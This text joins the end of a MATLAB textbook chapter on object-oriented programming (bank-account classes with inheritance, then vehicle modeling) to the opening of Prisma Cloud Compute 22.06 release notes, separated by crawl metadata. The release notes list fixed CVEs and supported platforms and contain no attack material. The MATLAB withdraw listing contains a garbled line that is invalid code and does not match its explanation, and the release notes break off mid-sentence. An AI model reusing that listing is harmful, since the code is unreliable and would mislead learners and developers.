attributes (constants in this example). Line 11: Sets the class of the default object with the parent object included. Lines 12 and 13: Show the copy constructor. Lines 15–19: Show the real constructor, which differs only in passing the initial balance to the parent constructor. In Listing 18.20: Lines 1–3: Show the method header. In Listing 18.20: Lines 1–3: Show the method header. Line 4: You can earn interest only if your balance is above the specified minimum balance. Line 5: Calculates the interest earned during this time period. Line 7: No interest is earned on small balances. In Listing 18.21: Lines 1–3: Show the method header. Line 4: Invokes the parent char(...) method for the balance information; this function adds only the account type. We could, of course, extend this to include the local attributes. The code shown in Listing 18.22 tests the savings account logic. In Listing 18.22: Line 1: Creates a savings account with an initial deposit of $2,000. This calls the parent display(...) method. Line 2: Invokes the parent’s deposit method to add another $3,000. Line 3: Displays this account information. Line 4: Invokes our calcInterest(...) method. Line 5: Deposits this interest back into the account. Line 6: Shows the updated information. The output from this test is shown in Listing 18.23. ### Listing 18.21 SavingsAccount char(...) method 1. function s = char(sa) 2. % @SavingsAccount\char for the SavingsAccount 3. % returns string representation of the account 4. s=sprintf( 'Savings %s', char(sa.BankAccount) ); ### Listing 18.22 SavingsAccount tests 1. sa = SavingsAccount(2000) 2. deposit(sa, 3000); 3. fprintf('deposit 3000 -> %s\n', char(sa) ); 4. intrst = calcInterest(sa); 5. deposit(sa, intrst); 6. fprintf('deposit interest %.2f -> %s\n', ... intrst, char(sa) ); ### Listing 18.23 SavingsAccount test results Savings Account with $2000.00 deposit 3000 -> Savings Account with $5000.00 deposit interest 250.00 -> Savings Account with $5250.00 18.4.3 Inheritance by Redefinition We now consider a further extension of the BankAccount family—a SavingsAccount with a guaranteed overdraft, as shown in Figure 18.8. Once overdraft privileges have been authorized, users of this account can withdraw as much as they want. Of course, if the resulting balance is negative, the bank applies an overdraft charge, thereby taking away even more money than is available. The coding for this account will follow the general guidelines used above—a new constructor (Listing 18.24), a method for permitting overdrafts to occur (Listing 18.25), and a new char(...) method (Listing 18.26). The data for this class will include a Boolean value indicating that overdraft has been approved for this particular account object. However, this account will also need its own withdraw method to implement the new withdrawal rules (Listing 18.27). ![Figure 18.8 The DeluxSavingsAccount class](image) ### Listing 18.24 DeluxSavingsAccount constructor ```matlab function acct = DeluxSavingsAccount(data) % DeluxSavingsAccount class constructor. % ba = DeluxSavingsAccount(amt) creates an % account with balance amt % could also be a copy constructor: % ba = DeluxSavingsAccount( oda ) copies oda if nargin == 0 super = SavingsAccount; acct.overdraftOK = false; acct.OVERDRAFT_CHARGE = 20; acct=class(acct,'DeluxSavingsAccount', super); elseif isa(data,'DeluxSavingsAccount') acct = data; else super = SavingsAccount(data); acct.overdraftOK = false; acct.OVERDRAFT_CHARGE = 20; acct=class(acct,'DeluxSavingsAccount', super); end ``` In Listing 18.24: Lines 1–6: Show the constructor header. Lines 7–11: Show the default constructor defining the local attributes. Lines 12 and 13: Show the copy constructor. Lines 15–18: Show the real constructor. In Listing 18.25: Lines 1–3: Show the method header. Line 4: Sets the overdraft permission attribute to the value provided. Line 5: Returns the updated object. In Listing 18.26: Lines 1–3: Show the method header. Lines 4 and 5: Set the output string to ‘OK’ or ‘off’. Line 6: Creates the string. In Listing 18.27: Lines 3 and 4: Check to see if there is enough money, or if overdraft is allowed. Lines 5–7: Either way, we can use the parent’s withdraw method, but the parent object must be extracted and then replaced. Line 9: Assumes that the penalty is $0. **Listing 18.25** DeluxSavingsAccount allowOverdraft method 1. function allowOverdraft(acct, value) 2. % @DeluxSavingsAccount\allowOverdraft 3. % approve overdraft on DeluxSavingsAccount 4. acct.overdraftOK = value; 5. assignin('caller', inputname(1), acct); **Listing 18.26** DeluxSavingsAccount char(...) method 1. function s = char(sa) 2. % @DeluxSavingsAccount\char method 3. % returns string representation of the account 4. if sa.overdraftOK, strng = 'OK'; 5. else, strng = 'off'; end 6. s = sprintf( 'Delux %s with overdraft %s', ... char(sa.SavingsAccount), strng ); However, if the user is asking for more than the balance, the penalty amount applies. Update the balance using the parent’s `getBalance(...)` and `setBalance(...)` methods. Returns the updated object as usual. Notice the following observations: Like its predecessor, the `char(...)` method of the `DeluxSavingsAccount` class lets its parent classes generate much of the string, adding locally only the additional information. Also, the redefined `withdraw(...)` method invokes the parent’s `withdraw(...)` method if it can, but changes the balance by way of its `get` and `set` methods when it has to. In particular, observe that when it can use the parent `withdraw(...)` method, it only reaches back one level to the `SavingsAccount` parent. The fact that this parent does not implement `withdraw(...)` and passes the call to its parent is not a concern for this child class. Listing 18.28 shows a script to test the `DeluxSavingsAccount` class. ```plaintext Listing 18.27 Redefined withdraw method 1. function gets = withdraw(acct, amount) 2. % @DeluxSavingsAccount\withdraw method 3. if (amount < getBalance(acct)) 4. || ~acct.overdraftOK 5. parent = acct.SavingsAccount; 6. gets = withdraw(parent, amount); 7. acct.SavingsAccount = parent; 8. else 9. penalty = 0; 10. if amount > getBalance(acct) 11. penalty = acct.OVERDRAFT_CHARGE; 12. setBalance(acct, gets = withdraw(acct, amount) - amount - penalty); 13. end 14. end 15. assignin('caller', inputname(1), acct); Listing 18.28 Testing the DeluxSavingsAccount 1. dsa = DeluxSavingsAccount(2000) 2. deposit(dsa, calcInterest(dsa) ) 3. fprintf('deposit interest -> %s\n', char(dsa) ); 4. gets = withdraw(dsa, 3000); 5. fprintf('try to get 3000 -> $%8.2f; %s\n', ... gets, char(dsa) ) 6. deposit(dsa, 500); 7. fprintf('deposit 500 -> %s\n', char(dsa) ); 8. allowOverdraft(dsa, true) 9. gets = withdraw(dsa, 3000); 10. fprintf(...'enable overdraft and try again -> $%8.2f; %s\n', ... gets, char(dsa) ) ``` In Listing 18.28: Line 1: Creates a DeluxSavingsAccount object. Line 2: Uses the parent’s deposit and calcInterest methods. Line 3: Shows the result. Line 4: Attempts to withdraw $3,000 without overdraft enabled. Line 5: Shows the result—getting only the balance and an empty account. Line 6 and 7: Deposit another $500 and show the account. Line 8: Enables overdrafts. Line 9: Tries again for the $3,000. Line 10: Displays the final result. Listing 18.29 shows the result of testing the DeluxSavingsAccount class. ```java Delux Savings Account with $2000.00 with overdraft off deposit interest -> Delux Savings Account with $2100.00 with overdraft off try to get 3000 -> $ 2100.00; Delux Savings Account with $0.00 with overdraft off deposit 500 -> Delux Savings Account with $500.00 with overdraft off enable overdraft and try again -> $ 3000.00; Delux Savings Account with $-2520.00 with overdraft OK ``` 18.5 Practical Example—Vehicle Modeling It would be wrong to leave this discussion without an example of a more practical application of these techniques. Figure 18.9 illustrates the inheritance hierarchy for a collection of vehicles that might be used, for example, in a traffic simulation. 18.5.1 A Vehicle Hierarchy To simulate traffic dynamically, every vehicle must be able to be drawn, and to move in accordance with the rules that govern its behavior. Notice that many of the “simpler” actual vehicles do not contain their own move methods. Given a speed and heading for one of these vehicles, the generic vehicle move method can be applied. However, they all contain their own draw methods, because in general, drawing specific objects requires specific behavior in that draw method. The more complex vehicles (a semi pulling a trailer, for example) do have their own draw methods, however, because in addition to moving the semi, the trailer must be moved in such a way that it remains attached to the semi. Similarly, a transporter trailer containing other vehicles must move all the other vehicles in a manner consistent with their remaining on the trailer. ### 18.5.2 The Containment Relationship There is one other consideration to note. Any practical hierarchy actually reflects two different relationships between classes. We discussed the inheritance (IS-A) relationship in the previous paragraphs—it is all about inheriting data and methods from a parent class, and is implemented in the child constructor. Now we illustrate the other relationship—that of containment (HAS-A), used to indicate a relationship of possession between objects. Two examples follow: 1. A semi class has a trailer attached. There is no inheritance of data or methods between the semi and trailer classes. Rather, one of the attributes peculiar to the semi is a trailer object—that attribute can be accessed by set and get methods, permitting the semi to move and draw its trailer. 2. A transporter contains a collection of vehicles. Its move and draw methods must be able to traverse that collection, calling the move or draw methods for the children as appropriate. --- **Chapter Summary** This chapter presented the object-oriented paradigm, including class categories and MATLAB implementations: - Fundamentals of Object-Oriented Programming (OOP) - How MATLAB implements OOP - Examples of inheritance and polymorphism - An example of vehicle modeling
{"Source-Url": "http://www.dms489.com/Concepts_book/onlinechapters/Chapter18.pdf", "len_cl100k_base": 11603, "olmocr-version": "0.1.50", "pdf-total-pages": 30, "total-fallback-pages": 0, "total-input-tokens": 66263, "total-output-tokens": 13141, "length": "2e13", "weborganizer": {"__label__adult": 0.0002884864807128906, "__label__art_design": 0.00026297569274902344, "__label__crime_law": 0.0001876354217529297, "__label__education_jobs": 0.0009613037109375, "__label__entertainment": 4.661083221435547e-05, "__label__fashion_beauty": 0.00010693073272705078, "__label__finance_business": 0.00016772747039794922, "__label__food_dining": 0.0002371072769165039, "__label__games": 0.00046133995056152344, "__label__hardware": 0.000629425048828125, "__label__health": 0.00023603439331054688, "__label__history": 0.00016605854034423828, "__label__home_hobbies": 8.171796798706055e-05, "__label__industrial": 0.0002961158752441406, "__label__literature": 0.0001646280288696289, "__label__politics": 0.000148773193359375, "__label__religion": 0.0003685951232910156, "__label__science_tech": 0.00455474853515625, "__label__social_life": 6.669759750366211e-05, "__label__software": 0.004058837890625, "__label__software_dev": 0.98583984375, "__label__sports_fitness": 0.00022685527801513672, "__label__transportation": 0.0005025863647460938, "__label__travel": 0.00017154216766357422}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 49159, 0.05086]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 49159, 0.84243]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 49159, 0.87797]], "google_gemma-3-12b-it_contains_pii": [[0, 554, false], [554, 2997, null], [2997, 5586, null], [5586, 7773, null], [7773, 9116, null], [9116, 11950, null], [11950, 13142, null], [13142, 15809, null], [15809, 17877, null], [17877, 20410, null], [20410, 22272, null], [22272, 24060, null], [24060, 25155, null], [25155, 26815, null], [26815, 29309, null], [29309, 30718, null], [30718, 32732, null], [32732, 34186, null], [34186, 35134, null], [35134, 36595, null], [36595, 38565, null], [38565, 39156, null], [39156, 40770, null], [40770, 42371, null], [42371, 43740, null], [43740, 45752, null], [45752, 47495, null], [47495, 48383, null], [48383, 49159, null], [49159, 49159, null]], "google_gemma-3-12b-it_is_public_document": [[0, 554, true], [554, 2997, null], [2997, 5586, null], [5586, 7773, null], [7773, 9116, null], [9116, 11950, null], [11950, 13142, null], [13142, 15809, null], [15809, 17877, null], [17877, 20410, null], [20410, 22272, null], [22272, 24060, null], [24060, 25155, null], [25155, 26815, null], [26815, 29309, null], [29309, 30718, null], [30718, 32732, null], [32732, 34186, null], [34186, 35134, null], [35134, 36595, null], [36595, 38565, null], [38565, 39156, null], [39156, 40770, null], [40770, 42371, null], [42371, 43740, null], [43740, 45752, null], [45752, 47495, null], [47495, 48383, null], [48383, 49159, null], [49159, 49159, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 49159, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 49159, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 49159, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 49159, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 49159, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 49159, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 49159, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 49159, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 49159, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, true], [5000, 49159, null]], "pdf_page_numbers": [[0, 554, 1], [554, 2997, 2], [2997, 5586, 3], [5586, 7773, 4], [7773, 9116, 5], [9116, 11950, 6], [11950, 13142, 7], [13142, 15809, 8], [15809, 17877, 9], [17877, 20410, 10], [20410, 22272, 11], [22272, 24060, 12], [24060, 25155, 13], [25155, 26815, 14], [26815, 29309, 15], [29309, 30718, 16], [30718, 32732, 17], [32732, 34186, 18], [34186, 35134, 19], [35134, 36595, 20], [36595, 38565, 21], [38565, 39156, 22], [39156, 40770, 23], [40770, 42371, 24], [42371, 43740, 25], [43740, 45752, 26], [45752, 47495, 27], [47495, 48383, 28], [48383, 49159, 29], [49159, 49159, 30]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 49159, 0.07283]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
7625c8309e9271f35bfe7535948bfa87f44b8411
[REMOVED]
{"Source-Url": "https://rd.springer.com/content/pdf/10.1007/3-540-48118-4_4.pdf", "len_cl100k_base": 12546, "olmocr-version": "0.1.53", "pdf-total-pages": 20, "total-fallback-pages": 0, "total-input-tokens": 68623, "total-output-tokens": 14911, "length": "2e13", "weborganizer": {"__label__adult": 0.0003952980041503906, "__label__art_design": 0.0005159378051757812, "__label__crime_law": 0.0004148483276367187, "__label__education_jobs": 0.0007181167602539062, "__label__entertainment": 9.340047836303712e-05, "__label__fashion_beauty": 0.00018465518951416016, "__label__finance_business": 0.0003993511199951172, "__label__food_dining": 0.0005083084106445312, "__label__games": 0.0006589889526367188, "__label__hardware": 0.00109100341796875, "__label__health": 0.0007314682006835938, "__label__history": 0.00030112266540527344, "__label__home_hobbies": 0.0001360177993774414, "__label__industrial": 0.0006504058837890625, "__label__literature": 0.0004146099090576172, "__label__politics": 0.0003693103790283203, "__label__religion": 0.0005578994750976562, "__label__science_tech": 0.0662841796875, "__label__social_life": 0.00010478496551513672, "__label__software": 0.005870819091796875, "__label__software_dev": 0.91845703125, "__label__sports_fitness": 0.0003333091735839844, "__label__transportation": 0.0007524490356445312, "__label__travel": 0.0002313852310180664}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46810, 0.01003]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46810, 0.42742]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46810, 0.80032]], "google_gemma-3-12b-it_contains_pii": [[0, 2346, false], [2346, 5448, null], [5448, 8262, null], [8262, 11019, null], [11019, 13694, null], [13694, 15647, null], [15647, 17776, null], [17776, 19936, null], [19936, 22403, null], [22403, 23301, null], [23301, 25872, null], [25872, 29009, null], [29009, 31127, null], [31127, 33214, null], [33214, 36298, null], [36298, 38425, null], [38425, 40466, null], [40466, 43226, null], [43226, 46324, null], [46324, 46810, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2346, true], [2346, 5448, null], [5448, 8262, null], [8262, 11019, null], [11019, 13694, null], [13694, 15647, null], [15647, 17776, null], [17776, 19936, null], [19936, 22403, null], [22403, 23301, null], [23301, 25872, null], [25872, 29009, null], [29009, 31127, null], [31127, 33214, null], [33214, 36298, null], [36298, 38425, null], [38425, 40466, null], [40466, 43226, null], [43226, 46324, null], [46324, 46810, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 46810, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46810, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46810, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46810, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46810, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46810, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46810, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46810, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46810, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46810, null]], "pdf_page_numbers": [[0, 2346, 1], [2346, 5448, 2], [5448, 8262, 3], [8262, 11019, 4], [11019, 13694, 5], [13694, 15647, 6], [15647, 17776, 7], [17776, 19936, 8], [19936, 22403, 9], [22403, 23301, 10], [23301, 25872, 11], [25872, 29009, 12], [29009, 31127, 13], [31127, 33214, 14], [33214, 36298, 15], [36298, 38425, 16], [38425, 40466, 17], [40466, 43226, 18], [43226, 46324, 19], [46324, 46810, 20]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46810, 0.06818]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
e5c376637de7f04b059cd820740d64d203542630
<table> <thead> <tr> <th>Section</th> <th>Page</th> </tr> </thead> <tbody> <tr> <td>Prisma Cloud Compute Edition Release Information</td> <td>5</td> </tr> <tr> <td>22.06 Update 7 Release Notes</td> <td>6</td> </tr> <tr> <td>Addressed Issues</td> <td>6</td> </tr> <tr> <td>22.06 Update 6 Release Notes</td> <td>7</td> </tr> <tr> <td>Addressed Issues</td> <td>7</td> </tr> <tr> <td>22.06 Update 5 Release Notes</td> <td>8</td> </tr> <tr> <td>Addressed Issues</td> <td>8</td> </tr> <tr> <td>22.06 Update 4 Release Notes</td> <td>9</td> </tr> <tr> <td>Addressed Issues</td> <td>9</td> </tr> <tr> <td>22.06 Update 3 Release Notes</td> <td>10</td> </tr> <tr> <td>Addressed Issues</td> <td>10</td> </tr> <tr> <td>Upcoming Breaking Changes</td> <td>11</td> </tr> <tr> <td>22.06 Update 2 Release Notes</td> <td>12</td> </tr> <tr> <td>Enhancements</td> <td>12</td> </tr> <tr> <td>Addressed Issues</td> <td>13</td> </tr> <tr> <td>End of Support Notifications</td> <td>14</td> </tr> <tr> <td>Upcoming breaking changes</td> <td>14</td> </tr> <tr> <td>22.06 Update 1 Release Notes</td> <td>16</td> </tr> <tr> <td>Improvements, Fixes, and Performance Enhancements</td> <td>16</td> </tr> <tr> <td>Known Issues</td> <td>17</td> </tr> <tr> <td>End of Support Notifications</td> <td>17</td> </tr> <tr> <td>22.06 Release Notes</td> <td>18</td> </tr> <tr> <td>CVE Coverage Update</td> <td>18</td> </tr> <tr> <td>New Features in the Core Platform</td> <td>19</td> </tr> <tr> <td>New Features in Container Security</td> <td>22</td> </tr> <tr> <td>New Features in Agentless Security</td> <td>31</td> </tr> <tr> <td>New Features in Host Security</td> <td>36</td> </tr> <tr> <td>New Features in Serverless Security</td> <td>36</td> </tr> <tr> <td>New features in Web Application and API Security (WAAS)</td> <td>37</td> </tr> <tr> <td>DISA STIG Scan Findings and Justifications</td> <td>44</td> </tr> <tr> <td>API Changes</td> <td>44</td> </tr> <tr> <td>Addressed Issues</td> <td>45</td> </tr> <tr> <td>End of Support Notifications</td> <td>46</td> </tr> <tr> <td>Supported Host Operating Systems</td> <td>46</td> </tr> <tr> <td>Changes in Existing Behavior</td> <td>47</td> </tr> <tr> <td>Known Issues</td> <td>48</td> </tr> <tr> <td>Upcoming Deprecation Notifications</td> <td>48</td> </tr> <tr> <td>Backward Compatibility for New Features</td> <td>49</td> </tr> </tbody> </table> Table of Contents Get Help ............................................................................................................. 53 Related Documentation ........................................................................................................... 54 Request Support ........................................................................................................................ 55 Prisma Cloud Compute Edition Release Information Prisma Cloud Compute Edition secures your hosts, containers, and serverless functions. To view the current operational status of Palo Alto Networks cloud services, see https://status.paloaltonetworks.com/. Before you begin using Prisma Cloud, make sure you review the following information: - 22.06 Update 7 Release Notes - 22.06 Update 6 Release Notes - 22.06 Update 5 Release Notes - 22.06 Update 4 Release Notes - 22.06 Update 3 Release Notes - 22.06 Update 2 Release Notes - 22.06 Update 1 Release Notes - 22.06 Release Notes 22.06 Update 7 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.234</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 7</td> </tr> <tr> <td>Release date</td> <td>Mar 13, 2023</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>f871922e48194c06a6551760a1e4c93ec89f1c22f0f6c1434b0501503266ba83</td> </tr> </tbody> </table> Addressed Issues - Addressed the following issues: - Fixed **CVE-2023-25173** and **CVE-2023-25153** (Severity - Moderate): the containerd package is used in the Prisma Cloud Defender and for Agentless Scanning. To address the vulnerability, upgrade to containerd version v1.6.18 or v1.5.18 as needed. - Fixed **CVE-2022-27664** (Severity - High): Updated the net module - golang.org/x/net - Go Packages to version v0.5.0. WAAS deployments were affected if you have a HTTP2 applications and have deployed WAAS to inspect HTTP2 traffic. Upgrade your Prisma Cloud console and deployed Defenders if you use WAAS to inspect HTTP2 traffic. 22.06 Update 6 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.232</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 6</td> </tr> <tr> <td>Release date</td> <td>February 14, 2023</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>70df141032c0ac641f74834e835b9c923405d5db56fa77564843c90d9da5e48a</td> </tr> </tbody> </table> - **Addressed Issues** - The *ubi-minimal* base image's packages are updated to the latest. - *bits-and-blooms/bloom* Go module is updated to v3.3.1 to fix CVE-2023-0247. - GoLang is updated to version 1.18.9 to fix CVE-2022-41717. 22.06 Update 5 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.229</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 5</td> </tr> <tr> <td>Release date</td> <td>Dec 8, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>b1831ebfbaf70c6724b236e219b1ae646cbcc381d42922efa6cbded755345fd2</td> </tr> </tbody> </table> - Addressed Issues - Fixed CVE-2022-42898 vulnerability found in krb5-libs package in Red Hat Enterprise Linux (RHEL) 8 for the Prisma Cloud Console and the Defender. 22.06 Update 4 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.228</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 4</td> </tr> <tr> <td>Release date</td> <td>Nov 20, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>216ccfd64b8ca66f036b811a6b94cdd38aeb8df34b1fd1af324245ed87bac7db</td> </tr> </tbody> </table> - **Addressed Issues** **Addressed Issues** - Addressed the following issues: - CVE-2016-3709 a Cross-site scripting (XSS) vulnerability found in libxml2 package in Red Hat Enterprise Linux. - Fixed an error in the credit usage utilization for WAAS. With this fix, when container/host Defenders are disconnected for 24 hours, the usage of the credit is automatically stopped until the Defenders reconnect. - Setting the collection scope for greater than 6000 collections under runtime policy rules would freeze, this is now fixed. 22.06 Update 3 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.224</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 3</td> </tr> <tr> <td>Release date</td> <td>Nov 7, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>f0451f05951ab28811f99ebc68adcdf58d17fd332f68290d03eab023d4510495</td> </tr> </tbody> </table> - Addressed Issues - Upcoming Breaking Changes **Addressed Issues** - Fixed an issue with incorrect health state for a Defender deployed on a container. - Addressed the following issues: - CVE-2020-7711 vulnerability detected in a vendor package - `gxomldsig`. - CVE-2022-40674 vulnerability detected in a vendor package - `expat` - CVE-2022-41716 vulnerability detected in Google Go Windows environment variable - `exec.cmd syscall` - Go update to version 1.18.8. The version includes security fixes. - Improved the reconnection time for multi-tenant deployments when some tenants are disconnected from the central Console. - Fixed a DNS resolution error when running a twistcli image scan with the `--tarball` option. - Fixed an issue where errors were reported in Google cloud discovery scan when the scanned service APIs are disabled. Now when such APIs are disabled on the Google cloud, cloud discovery do not display these as errors in the results. The messages are added to the console logs. - Fixed an issue with incorrect cluster information in image scan results on Monitor > Vulnerabilities > Deployed. - Fixed the rule scope selection for Out-of-Band WAAS rule. When adding a new Out-of-Band WAAS rule, you were unable to choose a container name in the rule scope, or save an Out-of-Band WAAS rule with a scope that included a namespace selection, or did not include an image selection. These issues are now fixed. Upcoming Breaking Changes - Alert Profile—as announced in Kepler Update 2. 22.06 Update 2 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.213</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 2</td> </tr> <tr> <td>Release date</td> <td>Sep 19, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>d780dd3e80152d98f585868e3dd7e5e02e66c5d1d604a4831694e89d9aadabd</td> </tr> </tbody> </table> - Enhancements - Addressed Issues - End of Support Notifications - Upcoming breaking changes Enhancements HTTPS Proxy Support for Agentless Scanning Agentless scanning now supports connections over an HTTPS proxy server. If you use custom certificates for authentication, you can now configure custom certificates for the connection to Console when using agentless scanning. Embed a Defender in a CloudFormation Fargate Task in YAML format Prisma Cloud Compute now supports embedding a Defender to a CloudFormation Fargate task in the YAML format, in addition to the JSON format. Also, Prisma Cloud now supports generating a protected Fargate task definition for a full CloudFormation template that contains other resources except for the task definition itself. Use the Console (Manage > Defenders > Deploy > Defenders) or the APIs (/api/22.06/defenders/fargate.yaml, /api/22.06/defenders/fargate.json) to complete the workflow. Update for CVE-2022-36085 As part of this release, Prisma Cloud has rolled out an update to the vulnerability data stream for CVE-2022-36085. After updating to the enhanced intelligence feed, you may see alerts on vulnerabilities in Prisma Cloud components and Defender images of releases 22.06 Update 1 or older versions. We have determined that Prisma Cloud components are not impacted by these vulnerabilities. There is no risk to continue running any of the supported Prisma Cloud releases. To ensure these vulnerability alerts do not display, we recommend upgrading to the latest 22.06 release where applicable. If you are not ready to upgrade right away, add an exception in the default Ignore Twistlock Components rule (under Defend > Vulnerabilities > Images > Deployed) to suppress these vulnerability alerts. Support for Additional Orchestrators on x86 Architecture - Google Kubernetes Engine (GKE) version 1.24.2 with containerd version 1.6.6 - Elastic Kubernetes Service (EKS) version 1.23.9 with containerd version 1.6.6 - Azure Kubernetes Service (AKS) version 1.24.3 with containerd version 1.6.4+azure-4 running on Linux - AKS version 1.24.3 running with containerd version 1.6.6+azure on Windows - Lightweight Kubernetes (k3s) version v1.24.4+k3s1 with containerd 1.6.6-k3s1 - OpenShift version 4.11 with CRIO 1.24.1 - Rancher Kubernetes Engine (RKE) version 1.24.4+rke2r1 with containerd 1.6.6-k3s1 Name Update for Cloud Native Network Firewall (CNNF) The Cloud Native Network Firewall (CNNF) is now renamed as Cloud Native Network Segmentation (CNNS). Addressed Issues - Fixed an issue that caused Defender to incorrectly report the Host OS as SLES15SP1 instead of SLES15. - Fixed an internal error that failed to refresh the vulnerability statistics under Monitor > Vulnerabilities > Vulnerability Explorer. - Fixed two issues with Defenders running on containerd/CRI-O nodes: - Defenders attempted to scan host file systems during image scans for containers that changed to the host mount namespace. This issue is fixed. - Defenders attempted to scan the host where the image had a mount point to the host filesystem and some parent directory of the mount point was a symlink. - Fixed an issue that prevented editing WAAS rules. On upgrade to 22.06, it was not possible to update or modify WAAS rules configured to protect the same port at multiple endpoints with different attributes, such as TLS, HTTP2, and gRPC. With this fix, such rules can now be modified. - Fixed the "Missing required VM instance data" error encountered during agentless scanning on Azure. Azure hosts with unmanaged operating system disks are skipped during the scan. Agentless scanning doesn't support Azure hosts with an unmanaged operating system disk. - Fixed a high memory usage issue in Linux distributions where CNNF/CNNS was enabled. In addition to upgrading to this release, CNNF/CNNS users are advised to upgrade 4.15.x kernel to >=5.4.x kernel. End of Support Notifications - With the end of support for Maven system dependencies, Defender injection for java functions is now implemented using the bundle as a Maven internal repository. With this update, `<systemPath>` dependency is no longer used. - With the end of support for compile dependency in Gradle 7.0, Defender injection for java functions is updated to implementation dependency using an internal repository. Upcoming breaking changes On upgrade to the next release, Lagrange, if you have configured an alert profile on Compute > Manage > Alerts and enabled the Image vulnerabilities (registry and deployed) trigger as well as the Immediately alert for deployed resources setting, you will now be getting immediate alerts for vulnerable registry images along with immediate alerts for deployed images. The volume of immediate alerts that are generated may be much higher than what you’ve seen in the previous releases because support for immediate alerting for registry images is being added in Lagrange. With this change, the Image vulnerabilities (registry and deployed) option is being separated into two: Deployed images vulnerabilities and Registry images vulnerabilities, and both these triggers will be enabled if the original trigger was enabled in the alert profile. 22.06 Update 1 Release Notes The following table provides the release details: <table> <thead> <tr> <th>Build</th> <th>22.06.197</th> </tr> </thead> <tbody> <tr> <td>Codename</td> <td>Kepler, 22.06 Update 1</td> </tr> <tr> <td>Release date</td> <td>Jul 27, 2022</td> </tr> <tr> <td>Type</td> <td>Maintenance release</td> </tr> <tr> <td>SHA-256 digest</td> <td>5aa618314e176d03e559e58d2eba50959365cdc145cba99f5d47d90737d233bf</td> </tr> </tbody> </table> Improvements, Fixes, and Performance Enhancements - Added support for more orchestrators: - Google Kubernetes Engine (GKE) version 1.23.7 with containerd version 1.5.11 - GKE version 1.24.1 running on ARM64 architecture. For the full announcement, refer to our blog. - VMware Tanzu Kubernetes Grid Integrated (TKGI) version 1.14 - VMware Tanzu Kubernetes Grid Multicloud (TKGM) version 1.5.1 on Photon 3 and Ubuntu 20.04.03 LTS - Fixed the broken pipe error that occurred while downloading a large image CSV for secondary consoles when using Projects. The error was fixed by extending the HTTP client timeout value. - Fixed the welcome tour screen for new users who don’t have an administrator role. - Fixed an issue wherein the Defenders blocked application deployments on SELinux due to incorrect SELinux labeling on proxy runc. The issue was fixed by applying the original runc’s SELinux label to the created runc proxy binary. - Fixed the validity period error of self-signed certificates. The limit of 365 has been waved 